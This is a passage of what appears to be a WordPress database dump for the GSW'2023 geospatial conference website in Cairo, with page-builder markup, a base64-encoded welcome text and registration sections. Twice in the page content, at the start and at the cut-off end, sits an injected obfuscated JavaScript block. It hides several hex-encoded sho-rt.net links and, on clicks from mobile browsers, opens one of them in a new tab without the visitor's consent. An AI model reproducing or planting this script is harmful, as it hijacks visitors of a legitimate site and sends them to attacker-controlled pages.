x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Preliminary Program','','inherit','closed','closed','','2669-revision-v1','','','2023-06-23 20:30:40','2023-06-23 20:30:40','',2669,'https://gsw2023.com/?p=4748',0,'revision','',0),
(4749,4,'2023-06-23 20:34:55','2023-06-23 20:34:55','[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"][/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column width=\"2/3\"][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[/vc_raw_html][/vc_column][vc_column width=\"1/3\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\n[/bsf-info-box][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]\n<h6>Geospatial Week Director ,The University of Calgary</h6>\n[/bsf-info-box][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\" dt_text_icon_title=\"\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v 